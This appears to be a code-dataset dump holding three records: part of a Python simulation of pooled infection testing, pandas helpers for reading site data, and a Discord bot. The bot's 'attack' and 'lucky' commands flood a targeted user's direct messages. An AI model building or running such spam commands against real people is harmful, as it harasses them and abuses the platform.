on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error)\n n0= one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return (np.array([]), np.array([]), p0, p1, n0, n1)\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array,batch_size,typeII_error, typeI_error)\n return(temp0, temp1, temp_con, p0, p1, n0, n1)\n\ndef seq_test(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1, \nprob_threshold = 1, seq = True, batch_limit = 32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = [] #renamed to negativeInfoList\n pos_list = [] #renamed to positiveInfoList\n consum = 0\n temp = {'data': subject_array,\n 'NB_Num': 0,\n 'PB_Num': 0,\n 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = [] #renamed to negativeBatches\n pos_array = [] #renamed to positiveBatches\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],\n typeII_error, typeI_error, \n batch_limit = batch_limit)\n temp0 = {'data': temp0,\n 'NB_Num': i['NB_Num'] + 1,\n 'PB_Num': i['PB_Num'],\n 'p': p0,\n 'batch_size': n0}\n temp1 = {'data': temp1,\n 'NB_Num': i['NB_Num'],\n 'PB_Num': i['PB_Num'] + 1,\n 'p': p1,\n 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n \n if len(temp1['data'])>0:\n if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con \n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n \n neg_array[:,1] = 0\n individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, consum, individual_con)\n\ndef npv_score(y_true, y_pred):\n \"\"\"\n A function provides npv given the prediction and the truth \n \"\"\"\n tn, _, fn, _ = confusion_matrix(y_true = y_true,\n y_pred = y_pred).ravel()\n return tn/(tn + fn)\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true = y_true,\n y_pred = y_pred).ravel()\n return tn/(tn + fp)\n\n@jit(parallel = True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n #print(np.random.get_state()[1][0])\n random_table = np.random.binomial(size = size, p = p, n = 1)\n test_array = np.zeros((size, 2), dtype = int)\n for i in range(size):\n test_array[i,0] = i\n test_array[i,1] = random_table[i]\n return test_array\n\n\ndef test_result(data, seq_test, **kwargs):\n \"\"\"\n a helper function provides convenient results for a given test method with its **kwargs\n\n Input:\n data (array or list of arrays)\n seq_test (test_method object): could be seq_test, matrix_test and other test_method objects\n Output:\n result (DataFrame): a dataframe contains important evaluation metrics for the test method \n \"\"\"\n if isinstance(data, list) == False:\n \n pred,consum, ind_con = seq_test(data, **kwargs)\n result = {'acc': np.mean(pred[:,1] == data[:,1]),\n 'sens': recall_score(data[:,1], pred[:,1]),\n 'spec': specificity_score(data[:,1], pred[:,1]),\n 'PPV': precision_score(data[:, 1], pred[:,1]),\n 'NPV': npv_score(data[:, 1], pred[:,1]),\n 'test_consum': consum,\n 'ind_consum': ind_con,\n 'batch_consum': consum - ind_con}\n return result\n else:\n length = len(data)\n acc = np.zeros(length)\n sens = np.zeros(length)\n spec = np.zeros(length)\n ppv = np.zeros(length)\n npv = np.zeros(length)\n test_consum = np.zeros(length)\n ind_consum = np.zeros(length)\n batch_consum = np.zeros(length)\n for i in range(length):\n \n pred,consum, ind_con = seq_test(data[i], **kwargs)\n \n acc[i] = np.mean(pred[:,1] == data[i][:,1])\n sens[i] = recall_score(data[i][:,1], pred[:,1])\n spec[i] = specificity_score(data[i][:,1], pred[:,1])\n ppv[i] = precision_score(data[i][:,1], pred[:,1])\n npv[i] = npv_score(data[i][:,1], pred[:,1])\n test_consum[i] = consum\n ind_consum[i] = ind_con\n batch_consum[i] = consum-ind_con\n\n result = {'acc': acc,\n 'sens': sens,\n 'spec': spec,\n 'PPV': ppv,\n 'NPV': npv,\n 'test_consum': test_consum,\n 'ind_consum': ind_consum,\n 'batch_consum': batch_consum}\n return pd.DataFrame(result)\n\n\n\ndef matrix_test(subject_array, side_length, typeII_error, typeI_error, sq_repeat = 1 ,ind_repeat = 1, seq = True):\n\n \"\"\"\n This function provides the matrix testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n side_length (int): the side length of the matrix testing\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n sq_repeat (int): the number of parallel testing for the column/row batch testing\n ind_repeat (int): the number of potential individual testing for the positive crossings\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n\n\n\n matrix_test_num = len(subject_array)//(side_length**2)\n matrix_test_array = subject_array[0:matrix_test_num*side_length**2, :]\n ind_test_array = subject_array[matrix_test_num*side_length**2:, :]\n \n ind_idx = []\n \n for temp_batch in np.array_split(matrix_test_array, matrix_test_num):\n temp_batch = temp_batch.reshape(side_length, side_length, 2)\n temp_row = []\n temp_col = []\n random_num_row = np.random.uniform(0, 1, sq_repeat)\n random_num_col = np.random.uniform(0, 1, sq_repeat)\n for i in range(side_length):\n if 1 in (temp_batch[i,:,1]):\n if max(random_num_row) > typeII_error:\n temp_row.append(temp_batch[i,:,0])\n else:\n if min(random_num_row) < typeI_error:\n temp_row.append(temp_batch[i, :, 0])\n if 1 in (temp_batch[:,i,1]):\n if max(random_num_col) > typeII_error:\n temp_col.append(temp_batch[:,i,0])\n else:\n if min(random_num_col) < typeI_error:\n temp_col.append(temp_batch[:, i, 0])\n ind_idx.append(np.intersect1d(temp_row, temp_col))\n\n ind_idx = np.concatenate(ind_idx)\n ind_idx = ind_idx.astype('int')\n \n if len(ind_idx) == 0:\n neg_array = matrix_test_array\n else:\n mask = np.zeros(subject_array.shape[0], dtype = bool)\n mask[ind_idx] = True\n mask[matrix_test_num*side_length**2:] = True\n ind_test_array = subject_array[mask,:]\n \n \n neg_array = subject_array[~mask, :]\n \n\n \n \n neg_array[:, 1] = 0\n \n ind_test, ind_con = conventional_test(ind_test_array,\n typeII_error, typeI_error, repeat = ind_repeat, seq = seq)\n \n \n \n batch_test_num = matrix_test_num * 2 * side_length * sq_repeat\n result = np.concatenate((neg_array, ind_test))\n result = result[result[:, 0].argsort()]\n \n return (result, batch_test_num + ind_con, ind_con)\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error, typeI_error, parallel_num, ind_repeat, seq):\n\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n\n\n\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array)/batch_size)* parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(subject_array)/batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in (temp_batch[:, 1]):\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n else:\n if random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])\n\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch, typeII_error, typeI_error,\n repeat = ind_repeat, seq = seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, batch_consum+individual_con, individual_con)\n \n\ndef fixed_batch_seq_test(subject_array,stop_rule, p, batch_size, typeII_error, typeI_error, repeat, prob_threshold = 0.3, seq = True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n \n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array,\n 'NB_Num': 0,\n 'PB_Num': 0,\n 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],\n typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0),\n 'NB_Num': i['NB_Num'] + 1,\n 'PB_Num': i['PB_Num'],\n 'p': p0,\n 'batch_size': batch_size}\n temp1 = {'data': np.random.permutation(temp1),\n 'NB_Num': i['NB_Num'],\n 'PB_Num': i['PB_Num'] + 1,\n 'p': p1,\n 'batch_size': batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n \n if len(temp1['data'])>0:\n if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con \n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n \n neg_array[:,1] = 0\n individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, consum, individual_con)\n\n\n \ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2*n-1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n\n temp = temp_cur\n\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n\n return output, neg_symbol, pos_symbol\n\n\n\ndef seq_test_with_node(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1, \nprob_threshold = 1, seq = True, batch_limit = 32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array,\n 'NB_Num': 0,\n 'PB_Num': 0,\n 'p': p,\n 'batch_size': batch_size,\n 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],\n typeII_error, typeI_error, \n batch_limit = batch_limit)\n temp0 = {'data': temp0,\n 'NB_Num': i['NB_Num'] + 1,\n 'PB_Num': i['PB_Num'],\n 'p': p0,\n 'batch_size': n0,\n 'node': i['node'] + '-'}\n temp1 = {'data': temp1,\n 'NB_Num': i['NB_Num'],\n 'PB_Num': i['PB_Num'] + 1,\n 'p': p1,\n 'batch_size': n1,\n 'node': i['node'] + '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n \n if len(temp1['data'])>0:\n if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum) \n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:,0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n #print(neg_array)\n #print(neg_node)\n #neg_node = np.concatenate(neg_node)\n\n for k in pos_list:\n pos_array.append(k['data'])\n #pos_node.append(k['node'])\n #pos_node.append(np.column_stack((k['data'][:,0],np.repeat(k['node'], len(k['data'])))))\n temp = [[x, k['node']] for x in k['data'][:,0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n #pos_node = np.concatenate(pos_node)\n\n \n neg_array[:,1] = 0\n individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n #node = np.concatenate((pos_node, neg_node))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n #node = node[node[:,0].argsort()]\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, consum, individual_con, node, batch_num_list)\n\n\n\n\n\n\n",
"step-ids": [
10,
14,
15,
17,
20
]
}
|
[
10,
14,
15,
17,
20
] |
import pandas as pd
def _get_site_name(f,i):
data_file = f +"\\"+"new_desc_sele_data.csv"
site_name=pd.read_csv(data_file)["SITE_ID"][i]
return site_name
def _get_site_DD_dataset_csv(f,i):
'''获取经过全部数据集(经过全部的特征选择)'''
site_path=_get_site_folder(f,i)
data_path=site_path+"\\data_confirm.csv"
data=pd.read_csv(data_path)
return data
def _get_site_IGBP(f,i):
data_file = f +"\\"+"new_desc_sele_data_origin.csv"
site_IGBP=pd.read_csv(data_file)["IGBP"][i]
return site_IGBP
def _get_site_feature_ale(f,i,feauture):
site_path=_get_site_folder(f,i)
prefix="ale_1_"
if type(feauture) is str:
ale_path=site_path+"\\"+prefix+feauture+".csv"
ale_data=pd.read_csv(ale_path)
return ale_data
def _get_version_res_folder(f,version,site_name=None,i=None):
import os
version_folder=f+"\\"+version
if i:
site_name=_get_site_name(f,i)
elif site_name:
site_name = site_name
if os.path.exists(version_folder):
site_version_res_folder=version_folder+"\\"+site_name
if os.path.exists(site_version_res_folder):
return site_version_res_folder
else:
os.mkdir(site_version_res_folder)
return site_version_res_folder
def _get_site_folder(f,i=None,feature_name=None):
data_file = f + "\\" + "new_desc_sele_data_origin.csv"
data_content = pd.read_csv(data_file)
print(feature_name)
if type(i) is int:
site_path=data_content["SITE_PATH"][i]
return site_path
elif type(feature_name) is str:
site_path = data_content["SITE_PATH"][data_content["SITE_ID"]==feature_name].values[0]
return site_path
else:
print("lack of index or feature_name.")
|
normal
|
{
"blob_id": "c034fba0b9204545b00ba972a17e63cf9c20854e",
"index": 3930,
"step-1": "<mask token>\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\n<mask token>\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-2": "<mask token>\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\ndef _get_site_DD_dataset_csv(f, i):\n \"\"\"获取经过全部数据集(经过全部的特征选择)\"\"\"\n site_path = _get_site_folder(f, i)\n data_path = site_path + '\\\\data_confirm.csv'\n data = pd.read_csv(data_path)\n return data\n\n\n<mask token>\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-3": "<mask token>\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\ndef _get_site_DD_dataset_csv(f, i):\n \"\"\"获取经过全部数据集(经过全部的特征选择)\"\"\"\n site_path = _get_site_folder(f, i)\n data_path = site_path + '\\\\data_confirm.csv'\n data = pd.read_csv(data_path)\n return data\n\n\ndef _get_site_IGBP(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n site_IGBP = pd.read_csv(data_file)['IGBP'][i]\n return site_IGBP\n\n\ndef _get_site_feature_ale(f, i, feauture):\n site_path = _get_site_folder(f, i)\n prefix = 'ale_1_'\n if type(feauture) is str:\n ale_path = site_path + '\\\\' + prefix + feauture + '.csv'\n ale_data = pd.read_csv(ale_path)\n return ale_data\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-4": "import pandas as pd\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\ndef _get_site_DD_dataset_csv(f, i):\n \"\"\"获取经过全部数据集(经过全部的特征选择)\"\"\"\n site_path = _get_site_folder(f, i)\n data_path = site_path + '\\\\data_confirm.csv'\n data = pd.read_csv(data_path)\n return data\n\n\ndef _get_site_IGBP(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n site_IGBP = pd.read_csv(data_file)['IGBP'][i]\n return site_IGBP\n\n\ndef _get_site_feature_ale(f, i, feauture):\n site_path = _get_site_folder(f, i)\n prefix = 'ale_1_'\n if type(feauture) is str:\n ale_path = site_path + '\\\\' + prefix + feauture + '.csv'\n ale_data = pd.read_csv(ale_path)\n return ale_data\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-5": "import pandas as pd\n\n\ndef _get_site_name(f,i):\n data_file = f +\"\\\\\"+\"new_desc_sele_data.csv\"\n site_name=pd.read_csv(data_file)[\"SITE_ID\"][i]\n return site_name\n\ndef _get_site_DD_dataset_csv(f,i):\n '''获取经过全部数据集(经过全部的特征选择)'''\n site_path=_get_site_folder(f,i)\n data_path=site_path+\"\\\\data_confirm.csv\"\n data=pd.read_csv(data_path)\n return data\n\n\ndef _get_site_IGBP(f,i):\n data_file = f +\"\\\\\"+\"new_desc_sele_data_origin.csv\"\n site_IGBP=pd.read_csv(data_file)[\"IGBP\"][i]\n return site_IGBP\n\ndef _get_site_feature_ale(f,i,feauture):\n site_path=_get_site_folder(f,i)\n prefix=\"ale_1_\"\n if type(feauture) is str:\n ale_path=site_path+\"\\\\\"+prefix+feauture+\".csv\"\n ale_data=pd.read_csv(ale_path)\n return ale_data\n\ndef _get_version_res_folder(f,version,site_name=None,i=None):\n import os\n version_folder=f+\"\\\\\"+version\n if i:\n site_name=_get_site_name(f,i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder=version_folder+\"\\\\\"+site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\ndef _get_site_folder(f,i=None,feature_name=None):\n data_file = f + \"\\\\\" + \"new_desc_sele_data_origin.csv\"\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path=data_content[\"SITE_PATH\"][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content[\"SITE_PATH\"][data_content[\"SITE_ID\"]==feature_name].values[0]\n return site_path\n else:\n print(\"lack of index or feature_name.\")\n\n\n\n\n\n\n\n\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@bot.event
async def on_ready():
print(f'Logged in as {bot.user.name}')
@bot.command()
async def ping(ctx):
await ctx.send('pong')
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send('ARE YOU FELLING LUCKY???')
@bot.command()
async def spam(ctx, spamCtx='spam', spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
@bot.command()
async def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == '__main__':
bot.run(os.environ['TOKEN'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bot = commands.Bot(command_prefix='!')
@bot.event
async def on_ready():
print(f'Logged in as {bot.user.name}')
@bot.command()
async def ping(ctx):
await ctx.send('pong')
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send('ARE YOU FELLING LUCKY???')
@bot.command()
async def spam(ctx, spamCtx='spam', spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
@bot.command()
async def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == '__main__':
bot.run(os.environ['TOKEN'])
<|reserved_special_token_1|>
from discord.ext import commands
import discord
import os
import random
bot = commands.Bot(command_prefix='!')
@bot.event
async def on_ready():
print(f'Logged in as {bot.user.name}')
@bot.command()
async def ping(ctx):
await ctx.send('pong')
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send('ARE YOU FELLING LUCKY???')
@bot.command()
async def spam(ctx, spamCtx='spam', spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
@bot.command()
async def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == '__main__':
bot.run(os.environ['TOKEN'])
<|reserved_special_token_1|>
from discord.ext import commands
import discord
import os
import random
bot = commands.Bot(command_prefix="!")
@bot.event
async def on_ready():
print(f"Logged in as {bot.user.name}")
@bot.command()
async def ping(ctx):
await ctx.send("pong")
# Lucky command, it picks a number between 0-50 and spams your dm's with that number
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send("ARE YOU FELLING LUCKY???")
# Basic spam command, you can provide a message and specify how many messages
@bot.command()
async def spam(ctx, spamCtx="spam", spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
# Lets you mention a specific user who would like to spam in their DM's, you can specify a message
@bot.command()
async def attack(ctx, user: discord.User, *, message="GET SPAMMED NERD"):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == "__main__":
bot.run(os.environ['TOKEN'])
|
flexible
|
{
"blob_id": "b48bc9475a8dc593ba858af8ed4e930ae290fd69",
"index": 6479,
"step-1": "<mask token>\n",
